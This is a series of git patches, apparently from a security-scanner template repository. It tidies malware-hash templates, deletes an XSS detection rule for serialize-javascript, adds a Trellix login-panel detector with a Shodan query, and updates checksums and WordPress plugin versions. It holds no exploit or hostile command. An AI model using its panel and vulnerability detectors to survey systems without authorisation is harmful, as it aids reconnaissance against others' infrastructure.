a/file/malware/hash/codoso-pgv-malware-hash.yaml b/file/malware/hash/codoso-pgv-malware-hash.yaml index 59c7269679..f94d77ca43 100644 --- a/file/malware/hash/codoso-pgv-malware-hash.yaml +++ b/file/malware/hash/codoso-pgv-malware-hash.yaml @@ -12,7 +12,7 @@ info: file: - extensions: - - all + - all matchers: - type: dsl diff --git a/file/malware/hash/petya-ransomware-hash.yaml b/file/malware/hash/petya-ransomware-hash.yaml index 6ffd292b58..54648fae7f 100644 --- a/file/malware/hash/petya-ransomware-hash.yaml +++ b/file/malware/hash/petya-ransomware-hash.yaml @@ -11,7 +11,7 @@ tags: ransomware,malware file: - extensions: - - all + - all matchers: - type: dsl diff --git a/file/malware/hash/rokrat-malware-hash.yaml b/file/malware/hash/rokrat-malware-hash.yaml index fc25dcc792..24e6390883 100644 --- a/file/malware/hash/rokrat-malware-hash.yaml +++ b/file/malware/hash/rokrat-malware-hash.yaml @@ -12,7 +12,7 @@ info: file: - extensions: - - all + - all matchers: - type: dsl From e2a1696f5d473166149eb8833e8e679dc2bf5c63 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 20 Jun 2024 22:18:06 +0400 Subject: [PATCH 0469/1841] Delete file/nodejs/xss-serialize-javascript.yaml --- file/nodejs/xss-serialize-javascript.yaml | 26 ----------------------- 1 file changed, 26 deletions(-) delete mode 100644 file/nodejs/xss-serialize-javascript.yaml diff --git a/file/nodejs/xss-serialize-javascript.yaml b/file/nodejs/xss-serialize-javascript.yaml deleted file mode 100644 index 9f25a2c7fc..0000000000 --- a/file/nodejs/xss-serialize-javascript.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: xss-serialize-javascript - -info: - name: XSS Serialize Javascript - author: me_dheeraj (https://twitter.com/Dheerajmadhukar) - severity: info - description: Untrusted user input reaching `serialize-javascript` with `unsafe` attribute can cause Cross Site Scripting (XSS). - tags: file,nodejs,serialize,xss -file: - - extensions: - - all - matchers: - - type: regex - regex: - - "require\\('serialize-javascript'\\)" - - "\\$S\\(\\.\\*?, \\{unsafe: true\\}\\)" - condition: or - - - type: regex - negative: true - regex: - - "escape\\(.*?\\)" - - "encodeURI\\(.*?\\)" - condition: or - -# digest: 4b0a00483046022100c969127d5164e847745c08918d013ec03653d1ebd3df975a2ebba346eabc86ca022100eb6452e18b4c019fede7e45505c43395c0a854ec7842beb502dfed933b126877:922c64590222798bb761d5b6d8e72950 From c49df3636dcf182b7f5289fcaf33b63a587eb062 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 20 Jun 2024 18:18:38 +0000 Subject: [PATCH 0471/1841] Auto Generated Templates Checksum [Thu Jun 20 18:18:37 UTC 2024] :robot: --- templates-checksum.txt | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 0e92d9642e..d5e8e83626 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -189,8 +189,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:5df354979232e33156fcd31f6378019fa338c6f3 -cves.json-checksum.txt:8e59a06308786a4d94d3241e7e880816bdd9c1ff +cves.json:a82e81b521b8ef2fa309bb79b5e254703f900f50 +cves.json-checksum.txt:1a4855caa4afbcd48ef60adf60ca5639adb6634b dast/cves/2018/CVE-2018-19518.yaml:3407e99af553fe5bdb0ffc001a4132e169c55730 dast/cves/2021/CVE-2021-45046.yaml:a52633e88957969fb09969be45c0a8606ee3d752 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -562,7 +562,6 @@ file/nodejs/express-lfr.yaml:092467a73e9ced0cfb29ab04ee9e9734cb2df623 file/nodejs/generic-path-traversal.yaml:0108d77fe8ff2b62ed30a2d1dfe6419ce003ad20 file/nodejs/tar-path-overwrite.yaml:0f92e145fd143bf524c0d9ac33684b59c87968dd file/nodejs/xss-disable-mustache-escape.yaml:5789f72b913f4c617553350ceda81cfa81808e96 -file/nodejs/xss-serialize-javascript.yaml:29499fa052ac5398f560e4ce88bd86a0a430bddd file/nodejs/zip-path-overwrite.yaml:dd882bde66cce627206423eb563b7d9c7b89b228 file/perl/perl-scanner.yaml:c2402eaaaf5d3a4ba9be2fa05e705bc9927f8780 file/php/php-scanner.yaml:798e59f21db88302cdfe2632929cd31f6a5f67d7 @@ -3190,7 +3189,7 @@ http/cves/2023/CVE-2023-44353.yaml:147dd7796888db15383a9db3b463b1c564bde8cf http/cves/2023/CVE-2023-4451.yaml:d5e665511b95b75eea8988c75f5427b4616e80c9 http/cves/2023/CVE-2023-44812.yaml:11e5628cb888352e0dcd50839df33dc85fb2b58c http/cves/2023/CVE-2023-44813.yaml:ba83815830ad498e3a1e78649d1ddc4a48612025 -http/cves/2023/CVE-2023-45136.yaml:05fb69618e8482eddb6e118b3424acf60cd6ef83 +http/cves/2023/CVE-2023-45136.yaml:2a03499c0b59bd8b7ccc46f6b8c0d20602671b3e http/cves/2023/CVE-2023-4521.yaml:bf7e36be57080136c6ecbbc5e1d1844a5df269ec http/cves/2023/CVE-2023-45375.yaml:7279d79b85a43bff82cd0fdb9796ce516167493b http/cves/2023/CVE-2023-4542.yaml:c0a79c6b0145c8d875e16d60d6a0fea2632dd99b @@ -3205,6 +3204,7 @@ http/cves/2023/CVE-2023-4634.yaml:25ca2cd6e1903db0a7bc4d306856e30d2b98f8fc http/cves/2023/CVE-2023-46347.yaml:f8aaf0e2faa39f28d7f1f9d33c7b171d9ad38340 http/cves/2023/CVE-2023-46359.yaml:83426962f0f9937b49f713603c55628d16552b16 http/cves/2023/CVE-2023-46574.yaml:174ebe98cec3e58cd5233927899da721b1003e0c +http/cves/2023/CVE-2023-46732.yaml:447b853ace0a7fb18ace19291251bb8aaf3e07dd http/cves/2023/CVE-2023-46747.yaml:8034386aab766649cefb93c12ae6cd42ae1b09d9 http/cves/2023/CVE-2023-46805.yaml:1b2422c71b91214c98e03d968a0f8bc7db02914b http/cves/2023/CVE-2023-47115.yaml:f5f0d4869bc075f448f560f87f29febd4cc63497 @@ -8688,7 +8688,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:835d240e8d683f77b4d1ed05e186a2fba32efa59 +templates-checksum.txt:1bda7eb5ae79af72e209c8724ffa6fa63aa96bbc wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 07b11880fb48d9ec0743a5994db2a5a1220484bd Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 20 Jun 2024 18:20:30 +0000 Subject: [PATCH 0472/1841] Auto Template Signing [Thu Jun 20 18:20:30 UTC 2024] :robot: --- http/cves/2023/CVE-2023-46732.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-46732.yaml b/http/cves/2023/CVE-2023-46732.yaml index eff8e64d46..2d9f0560c5 100644 --- a/http/cves/2023/CVE-2023-46732.yaml +++ b/http/cves/2023/CVE-2023-46732.yaml @@ -42,3 +42,4 @@ http: - 'contains(header, "text/html")' - 'status_code == 200' condition: and +# digest: 4a0a00473045022100ef25fb37c01f959f49718a7988a4c20db0f2a69fd52826d8649e700c78e2c8720220128d976e934607551f8bb5b9767a1d95c97ab898a292eb1d1851c712e7fa0f3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 89018534d20ef948149ec6273b3be00f6b0ddb1d Mon Sep 17 00:00:00 2001 From: johnk3r Date: Thu, 20 Jun 2024 16:10:22 -0300 Subject: [PATCH 0473/1841] Create trellix-panel-detect.yaml --- http/exposed-panels/trellix-panel-detect.yaml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 http/exposed-panels/trellix-panel-detect.yaml diff --git a/http/exposed-panels/trellix-panel-detect.yaml b/http/exposed-panels/trellix-panel-detect.yaml new file mode 100644 index 0000000000..db45b87012 --- /dev/null +++ b/http/exposed-panels/trellix-panel-detect.yaml @@ -0,0 +1,33 @@ +id: trellix-panel-detect + +info: + name: Trellix Login Panel + author: johnk3r + severity: info + description: Trellix login panel was detected. + metadata: + max-request: 1 + shodan-query: "Server: Trellix" + tags: trellix,panel + +http: + - method: GET + path: + - "{{BaseURL}}/login/login" + + matchers-condition: and + matchers: + - type: regex + part: header + regex: + - "Trellix" + + - type: status + status: + - 200 + + extractors: + - type: kval + part: header + kval: + - Server From 44c2517acbc70d1c9c83830282de1b934cfd1acd Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 21 Jun 2024 00:19:32 +0000 Subject: [PATCH 0474/1841] Auto WordPress Plugins Update [Fri Jun 21 00:19:32 UTC 2024] :robot: --- helpers/wordpress/plugins/all-in-one-seo-pack.txt | 2 +- helpers/wordpress/plugins/copy-delete-posts.txt | 2 +- helpers/wordpress/plugins/gutenberg.txt | 2 +- helpers/wordpress/plugins/hostinger.txt | 2 +- helpers/wordpress/plugins/image-optimization.txt | 2 +- helpers/wordpress/plugins/limit-login-attempts-reloaded.txt | 2 +- helpers/wordpress/plugins/meta-box.txt | 2 +- helpers/wordpress/plugins/royal-elementor-addons.txt | 2 +- helpers/wordpress/plugins/simple-history.txt | 2 +- .../wordpress/plugins/sticky-header-effects-for-elementor.txt | 2 +- helpers/wordpress/plugins/woocommerce-legacy-rest-api.txt | 2 +- helpers/wordpress/plugins/woocommerce.txt | 2 +- helpers/wordpress/plugins/wp-seopress.txt | 2 +- helpers/wordpress/plugins/wp-smushit.txt | 2 +- helpers/wordpress/plugins/wpcf7-redirect.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/hostinger.yaml | 1 - http/technologies/wordpress/plugins/image-optimization.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/iwp-client.yaml | 1 - http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/metform.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/simple-history.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/svg-support.yaml | 1 - http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/templately.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../technologies/wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-seopress.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 215 files changed, 15 insertions(+), 215 deletions(-) diff --git a/helpers/wordpress/plugins/all-in-one-seo-pack.txt b/helpers/wordpress/plugins/all-in-one-seo-pack.txt index 101d404f94..d9167bb691 100644 --- a/helpers/wordpress/plugins/all-in-one-seo-pack.txt +++ b/helpers/wordpress/plugins/all-in-one-seo-pack.txt @@ -1 +1 @@ -4.6.4 \ No newline at end of file +4.6.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/copy-delete-posts.txt b/helpers/wordpress/plugins/copy-delete-posts.txt index c514bd85c2..7b5753f55b 100644 --- a/helpers/wordpress/plugins/copy-delete-posts.txt +++ b/helpers/wordpress/plugins/copy-delete-posts.txt @@ -1 +1 @@ -1.4.6 +1.4.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/gutenberg.txt b/helpers/wordpress/plugins/gutenberg.txt index dbb3191839..807e541706 100644 --- a/helpers/wordpress/plugins/gutenberg.txt +++ b/helpers/wordpress/plugins/gutenberg.txt @@ -1 +1 @@ -18.5.0 \ No newline at end of file +18.6.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/hostinger.txt b/helpers/wordpress/plugins/hostinger.txt index 13d683ccbf..d9c62ed923 100644 --- a/helpers/wordpress/plugins/hostinger.txt +++ b/helpers/wordpress/plugins/hostinger.txt @@ -1 +1 @@ -3.0.1 \ No newline at end of file +3.0.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/image-optimization.txt b/helpers/wordpress/plugins/image-optimization.txt index f0bb29e763..589268e6fe 100644 --- a/helpers/wordpress/plugins/image-optimization.txt +++ b/helpers/wordpress/plugins/image-optimization.txt @@ -1 +1 @@ -1.3.0 +1.3.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/limit-login-attempts-reloaded.txt b/helpers/wordpress/plugins/limit-login-attempts-reloaded.txt index 8987eb60cb..196e7f8906 100644 --- a/helpers/wordpress/plugins/limit-login-attempts-reloaded.txt +++ b/helpers/wordpress/plugins/limit-login-attempts-reloaded.txt @@ -1 +1 @@ -2.26.9 \ No newline at end of file +2.26.10 \ No newline at end of file diff --git a/helpers/wordpress/plugins/meta-box.txt b/helpers/wordpress/plugins/meta-box.txt index 1358c237c3..76d1514dde 100644 --- a/helpers/wordpress/plugins/meta-box.txt +++ b/helpers/wordpress/plugins/meta-box.txt @@ -1 +1 @@ -5.9.8 \ No newline at end of file +5.9.9 \ No newline at end of file diff --git a/helpers/wordpress/plugins/royal-elementor-addons.txt b/helpers/wordpress/plugins/royal-elementor-addons.txt index b9bd0f0e1c..c746af1942 100644 --- a/helpers/wordpress/plugins/royal-elementor-addons.txt +++ b/helpers/wordpress/plugins/royal-elementor-addons.txt @@ -1 +1 @@ -1.3.977 +1.3.977 \ No newline at end of file diff --git a/helpers/wordpress/plugins/simple-history.txt b/helpers/wordpress/plugins/simple-history.txt index fb0557132b..682895218b 100644 --- a/helpers/wordpress/plugins/simple-history.txt +++ b/helpers/wordpress/plugins/simple-history.txt @@ -1 +1 @@ -4.15.1 +4.15.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/sticky-header-effects-for-elementor.txt b/helpers/wordpress/plugins/sticky-header-effects-for-elementor.txt index 99c026bdee..42a0d4645b 100644 --- a/helpers/wordpress/plugins/sticky-header-effects-for-elementor.txt +++ b/helpers/wordpress/plugins/sticky-header-effects-for-elementor.txt @@ -1 +1 @@ -1.6.11 +1.6.11 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-legacy-rest-api.txt b/helpers/wordpress/plugins/woocommerce-legacy-rest-api.txt index ee90284c27..a6a3a43c3a 100644 --- a/helpers/wordpress/plugins/woocommerce-legacy-rest-api.txt +++ b/helpers/wordpress/plugins/woocommerce-legacy-rest-api.txt @@ -1 +1 @@ -1.0.4 +1.0.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce.txt b/helpers/wordpress/plugins/woocommerce.txt index c9277c5a60..6768f7e446 100644 --- a/helpers/wordpress/plugins/woocommerce.txt +++ b/helpers/wordpress/plugins/woocommerce.txt @@ -1 +1 @@ -9.0.0 \ No newline at end of file +9.0.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-seopress.txt b/helpers/wordpress/plugins/wp-seopress.txt index c8357abfec..ac2f3747d9 100644 --- a/helpers/wordpress/plugins/wp-seopress.txt +++ b/helpers/wordpress/plugins/wp-seopress.txt @@ -1 +1 @@ -7.9 \ No newline at end of file +7.9.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-smushit.txt b/helpers/wordpress/plugins/wp-smushit.txt index afb053553c..185e484bdd 100644 --- a/helpers/wordpress/plugins/wp-smushit.txt +++ b/helpers/wordpress/plugins/wp-smushit.txt @@ -1 +1 @@ -3.16.4 \ No newline at end of file +3.16.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wpcf7-redirect.txt b/helpers/wordpress/plugins/wpcf7-redirect.txt index 97ceee1b9f..d40b13a3fb 100644 --- a/helpers/wordpress/plugins/wpcf7-redirect.txt +++ b/helpers/wordpress/plugins/wpcf7-redirect.txt @@ -1 +1 @@ -3.1.5 \ No newline at end of file +3.1.7 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index b04ecf9d6e..7cbd1855ae 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f182aee26baa12c42d9d713b9cd026cbbea2f55109240fb603100f3819519e12022100b6da21024252357c87a0481f0b8b60287e7d8917cc18bb55726193456a419880:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index eaf96fc10d..8d579ff23d 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f68525f9c425fb686f5953b248633c2095abef062511a7643583542ed13814c602202bd17b7dfed2936671da2ca0b6447dd30c804172d0676b390e62457f35ba5966:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 5215868626..4a6d8b7bbe 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022061bd354f6009b58c52d961baf92dde9a9e5afdd7c72564eb580cabe67dcf5412022100982bc569e6cb0859eb7bbd1205fb6b5bcd59e31aa0f0b99e767750f503b52370:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 261ace1759..e4eb308d39 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ 